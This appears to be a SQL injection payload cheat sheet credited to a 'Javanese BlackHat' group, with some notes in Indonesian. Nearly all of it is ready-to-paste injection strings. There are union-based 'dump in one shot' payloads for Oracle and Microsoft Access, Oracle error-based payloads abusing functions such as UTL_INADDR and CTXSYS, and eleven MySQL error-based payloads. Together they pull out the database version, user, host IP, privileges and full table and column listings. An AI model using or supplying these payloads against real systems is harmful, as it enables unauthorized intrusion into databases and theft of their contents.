SQLI | SQL INJECTION | SYBASE | ORACLE | POSTGRESQL | SQLITE | IBM DB2 | MICROSOFT ACCESS | MSSQL



MYSQL | SYBASE | POSTGRESQL | IBM DB2 | ORACLE | SQLITE | INFORMIX | FIREBIRD | MICROSOFT ACCESS | MICROSOFT SERVER [MSSQL] | PHPMYWIND [MYSQL]

Re-Upload : 14 Juli 2022
========================

@Arjuna Dewangga
@Javanese BlackHat ID 14

========================
Credit : all Dewangga
Credit : PostgreSQL : Chaplin

SQLI UNION BASED :

– ORACLE SQL INJECTION
– POSTGRE SQL INJECTION
– SQLITE INJECTION
– SYBASE INJECTION
– MICROSOFT SQL SERVER INJECTION ( MSSQL Injection )
– MICROSOFT SQL ACCESS INJECTION
– IBM DB2 INJECTION

=================================

# DIOS MICROSOFT SQL ACCESS

and 1=0 UNION SELECT 1,2,3,4 from MSysAccessObjects

atau gunakan table/columns biasanya ( Microsoft access )

# DIOS ( ORACLE )

concat(‘DEW’,’%3cimg src=”link img” height=”290″ width=”290″%3e’||’%3cbr%3e’||’%3cli%3e’||’PRINT SYSTEM’||’%3cli%3e’||’VERSION :: ‘||(SELECT BANNER from V$version where rownum=1)||’%3cli%3e’||’DATABASE :: ‘||SYS.DATABASE_name||’%3cli%3e’||’ HostName IP Address :: ‘||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_address||’%3cbr%3e’||’ %3e%3e%3e ‘||(SELECT host_name FROM v$instance where rownum=1)||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_name||’%3cli%3e’||’USER :: ‘||user||’%3cli%3e’||’DB FILLES :: ‘||(SELECT name FROM V$DATAFILE where rownum=1)||’%3cli%3e’||’PRIVILEGES :: ‘||(SELECT grantee FROM dba_sys_privs where rownum=1)||’%3cli%3e’||’SERVER OPERATING SYSTEM :: ‘||(select member from v$logfile where rownum=1)||’%3cli%3e’||’THE SERVER SID :: ‘||(select instance_name from v$instance)||’%3cbr%3e’||’%3cbr%3e’||’%3cli%3e’||’DUMP DB’||’%3cbr%3e’||(select wm_concat(‘%3cli%3e’||table_name||’ %3e%3e%3e ‘||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c167))||’%3c!–‘

From Dual

ENCODE/DECODE = CHR
Jika tidak bisa WM_CONCAT ganti dengan LISTAGG

or 1=utl_inaddr.get_host_name(CHR(60)||CHR(98)||CHR(114)||CHR(62)||user||CHR(60)||CHR(98)||CHR(114)||CHR(62)||sys.database_name||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select banner from v%24version where rownum=1)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select wm_concat(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c25))

(select LISTAGG(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name) within group (ORDER BY table_name) from all_tab_columns where rownum%3c25)

ERROR BASED

And 1=UTL_INADDR.GET_HOST_NAME((select banner from v$version where rownum=1))%3b

And 1=UTL_INAADR.GET_HOST_ADDRESS((select banner from v$version where rownum=1))%3b

And 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),user,user)%3b

and 1=CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))%3b

and 1= and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null —

And 1=and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null —

And 1=and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null —

And 1=and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null —

And 1=and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null —

And 1= and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–

# DIOS ERROR BASED MYSQL

1.updatexml()
select %2a from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%3b

2.extractvalue()
select %2a from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))%3b

3.exp()
select %2a from users where id=1 and exp(%7e(select %2a from(select user())a))%3b

4.geometrycollection()
select %2a from users where id=1 and geometrycollection((select %2a from(select %2a from(select user())a)b))%3b

5.multipoint()
select %2a from users where id=1 and multipoint((select %2a from(select %2a from(select user())a)b))%3b

6.polygon()
select %2a from users where id=1 and polygon((select %2a from(select %2a from(select user())a)b))%3b

7.multipolygon()
select %2a from users where id=1 and multipolygon((select %2a from(select %2a from(select user())a)b))%3b

8.linestring()
select %2a from users where id=1 and linestring((select %2a from(select %2a from(select user())a)b))%3b

9.multilinestring()
select %2a from users where id=1 and multilinestring((select %2a from(select %2a from(select user())a)b))%3b

10.floor
select %2a from users where id=1 and (select 1 from (select count(%2a),concat(user(),floor(rand(0)%2a2))x from information_schema.tables group by x)a)%3b

11.PROCEDURE ANALYSE
+PROCEDURE ANALYSE+(EXTRACTVALUE(0,CONCAT(0x27,0x3a,@@VERSION)),1)

# Ket : Decode URL
===============
#SQLI #Sqlinjection #sqlihardbypass #sqlichallenge #sqlchall

THANKS